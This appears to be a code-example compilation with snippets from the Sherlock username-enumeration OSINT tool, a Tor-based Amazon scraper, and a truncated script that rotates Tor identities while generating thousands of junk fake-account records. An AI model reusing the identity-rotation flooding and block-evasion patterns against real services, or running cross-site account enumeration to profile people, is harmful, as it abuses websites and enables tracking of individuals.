                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "":
            print((Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" +
                   Fore.WHITE + "]" + Fore.GREEN + " {}:" + Fore.YELLOW +
                   " Error!").format(social_network))
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
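
A hypothetical invocation of this version; the site entry mirrors the keys the function actually reads (urlMain, url, errorType), with values made up for illustration:

site_data = {
    "GitHub": {
        "urlMain": "https://github.com/",
        "url": "https://github.com/{}",
        "errorType": "status_code",
    },
}
results = sherlock("some_username", site_data, verbose=True)
for site, info in results.items():
    print(site, info.get("exists"), info.get("http_status"))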
Example #28
# Add C:\...\Tor Browser\Browser\TorBrowser\Tor to the current user's environment variables (Windows 10)
import threading
from random import randint, random

from torrequest import TorRequest
import time
import requests
import json

if __name__ == '__main__':
    print('Python + TOR')

with TorRequest(proxy_port=9150, ctrl_port=9151, password=None) as tr:

    resp = tr.get('http://www.ipecho.net/plain')
    print("Current IP : " + resp.text)

    index_reset = 0

    for i in range(10000):

        index_reset += 1
        if index_reset > 50:
            index_reset = 0
            tr.reset_identity()
            resp = tr.get('http://www.ipecho.net/plain')
            print("Current IP : " + resp.text)

        data = {}
        data['name'] = str(i) + 1000 * chr(randint(1, 8192))
        data['username'] = 1000 * (chr(randint(65, 90)) + chr(randint(65, 90)) + chr(randint(65, 90))) + str(i) + '@random_domain.com'
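
The snippet is cut off before the generated record is submitted. Its identity-rotation pattern (reset every N requests) can be factored into a helper; a sketch with assumed names:

def rotated_get(tr, url, counter, rotate_every=50):
    """Fetch url through tr, requesting a new Tor identity every rotate_every calls."""
    if counter and counter % rotate_every == 0:
        tr.reset_identity()
    return tr.get(url)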
Example #29
from torrequest import TorRequest
from UserAgentList import user_agent_list
import random
from bs4 import BeautifulSoup
from time import sleep
import json

tr = TorRequest()
baseUrl = "http://www.amazon.com/dp/"
data = []


def reset_my_identity(url):
    tr.reset_identity()
    # tr.ctrl.signal('CLEARDNSCACHE')  # see Stem docs for the full API
    user_agent = random.choice(user_agent_list)
    headers = {'User-Agent': user_agent}
    page = tr.get(url, headers=headers)
    return page


def get_feature(soup):
    feature_list = []
    features = soup.find(id="feature-bullets")
    if features is None:
        return "None"
    for feature in features.find_all(class_="a-list-item"):
        # (assumed completion: the original snippet is truncated here)
        feature_list.append(feature.get_text(strip=True))
    return feature_list
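
Hypothetical usage of the two helpers above (the ASIN is invented; a real product ID is required):

page = reset_my_identity(baseUrl + "B01EXAMPLE")
soup = BeautifulSoup(page.text, "html.parser")
print(get_feature(soup))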
Example #30
def sherlock(username,
             site_data,
             query_notify,
             tor=False,
             unique_tor=False,
             proxy=None,
             timeout=None,
             ids_search=False,
             id_type='username',
             tags=None):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    ids_search             -- Search for other usernames in website pages & recursive search by them.
    id_type                -- Type of identifier to search for (default 'username').
    tags                   -- Iterable of tags used to filter which sites are checked.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username, id_type)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    max_workers = min(len(site_data), 20)

    #Create multi-threaded session for all requests.
    session = SherlockFuturesSession(max_workers=max_workers,
                                     session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        if net_info.get('type', 'username') != id_type:
            continue

        # Skip sites that don't match the requested tag filter.
        site_tags = set(net_info.get('tags', []))
        if tags and not set(tags).intersection(site_tags):
            continue

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info.get('url').format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True)):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            def parse_cookies(cookies_str):
                cookies = SimpleCookie()
                cookies.load(cookies_str)
                return {key: morsel.value for key, morsel in cookies.items()}
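            # Example: parse_cookies("a=1; b=2") -> {'a': '1', 'b': '2'}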

            # A hard-coded cookie string (e.g. a Yandex session export) can
            # be supplied here for sites that require one; empty by default.
            cookies_str = ''

            if 'yandex' in url_probe:
                cookies = parse_cookies(cookies_str)
            else:
                cookies = None

            # This future starts the request in a new thread without blocking the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    proxies=proxies,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                    # cookies=cookies
                )
            else:
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                    # cookies=cookies
                )

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identity for Tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Core logic: if Tor requests, make them here; if multi-threaded, wait for the responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)
        if not results_site:
            continue

        # Retrieve other site information again
        url = results_site.get("url_user")
        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Get the failure messages and comments
        failure_errors = net_info.get("errors", {})

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_text, exception_text = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network)

        # Get the response time for our request.
        try:
            response_time = r.elapsed
        except AttributeError:
            response_time = None

        # Attempt to get request information
        try:
            http_status = r.status_code
        except AttributeError:
            http_status = "?"
        try:
            response_text = r.text.encode(r.encoding)
        except (AttributeError, TypeError, LookupError):
            response_text = ""

        # Detect failures such as a country restriction
        for text, comment in failure_errors.items():
            if r.text and text in r.text:
                error_context = "Some error"
                error_text = comment
                break

        # workaround for 403 empty page
        if r is not None and r.status_code == 403:
            error_context = "Access denied"
            error_text = "Access denied, use proxy/vpn"

        # TODO: return error for captcha and some specific cases (CashMe)
        # make all result invalid

        extracted_ids_data = ""

        if ids_search and r:
            # print(r.text)
            extracted_ids_data = extract(r.text)

            if extracted_ids_data:
                new_usernames = {}
                for k, v in extracted_ids_data.items():
                    if 'username' in k:
                        new_usernames[v] = 'username'
                    if k in ('yandex_public_id', 'wikimapia_uid', 'gaia_id'):
                        new_usernames[v] = k

                results_site['ids_usernames'] = new_usernames

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 ids_data=extracted_ids_data,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            error = net_info.get("errorMsg")
            errors_set = set(error) if isinstance(error, list) else {error}
            # Checks if any of the known error messages is in the HTML
            error_found = any(err in r.text for err in errors_set)
            if not error_found:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total
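
This version reports through the query_notify object instead of printing directly. A minimal stand-in that satisfies the interface the function calls (start, update, finish); the real classes live in sherlock's notify module:

class PrintNotify:
    """Bare-bones QueryNotify substitute for quick experiments."""

    def start(self, username, id_type):
        print(f"Checking {id_type} '{username}'...")

    def update(self, result):
        print(result)

    def finish(self):
        print("All queries finished.")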